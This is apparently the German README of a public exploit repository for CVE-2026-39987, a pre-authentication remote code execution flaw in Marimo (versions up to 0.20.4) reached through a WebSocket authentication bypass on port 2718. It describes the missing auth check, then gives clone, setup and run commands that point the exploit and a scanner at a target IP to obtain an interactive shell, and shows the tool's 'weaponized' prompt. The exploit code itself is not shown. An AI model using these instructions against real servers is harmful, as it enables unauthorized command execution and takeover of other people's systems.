
Exploit für Marimo Pre-Auth-RCE über WebSocket-Auth-Bypass, der interaktiven Shell-Zugriff auf betroffene Versionen ermöglicht.
** Exploitation Framework ** | Full Remote Code Execution (RCE) | WebSocket Auth Bypass
Öffnen Sie die Datei website.html
Dieser Exploit zielt auf Marimo-Anwendungen ab, die WebSocket auf Port 2718 (Standard) ausführen. Die Schwachstelle ermöglicht nicht authentifizierte Befehlsausführung durch einen WebSocket-Authentifizierungs-Bypass, der Angreifern vollständige Remote-Code-Ausführungsfähigkeiten gewährt.
| Attribut | Details |
|---|---|
| CVE-ID | CVE-2026-39987 |
| Angriffsvektor | WebSocket Auth Bypass |
| Shell-Typ | Interaktives PTY (Pseudo-Terminal) |
| Auswirkung | Vollständige Remote Code Execution (RCE) |
| CVSS-Score | 9.3 (Kritisch) |
| Betroffene Versionen | Marimo ≤ 0.20.4 |
Die Schwachstelle existiert im WebSocket-Handshake-Mechanismus von Marimo-Anwendungen. Aufgrund einer unzureichenden Authentifizierungsvalidierung kann ein Angreifer:
Grundursache: Eine fehlende Authentifizierungsprüfung im WebSocket-Upgrade-Handler ermöglicht nicht authentifizierte Befehlsinjektion.
# Repository klonen
python3 -m venv venv
source venv/bin/activate
git clone https://github.com/mki9/CVE-2026-39987_exploit.git
cd CVE-2026-39987_exploit
chmod +x *
# Exploit-Befehle
* / Interaktive Shell (Standard)
1 / python CVE-2026-39987_exploit.py <TARGET_IP>
* / Hilfe
2 / python CVE-2026-39987_exploit.py
# Erforderliche Abhängigkeiten installieren
pip install websocket-client colorama rich pyfiglet
python CVE-2026-39987_scanner.py
# Eingeben
[*] Weaponized WebSocket Exploit Test
[!] Nur für autorisierte Nutzung
[?] Ziel-IP-Adresse oder Hostname eingeben:
>> <TARGET_IP>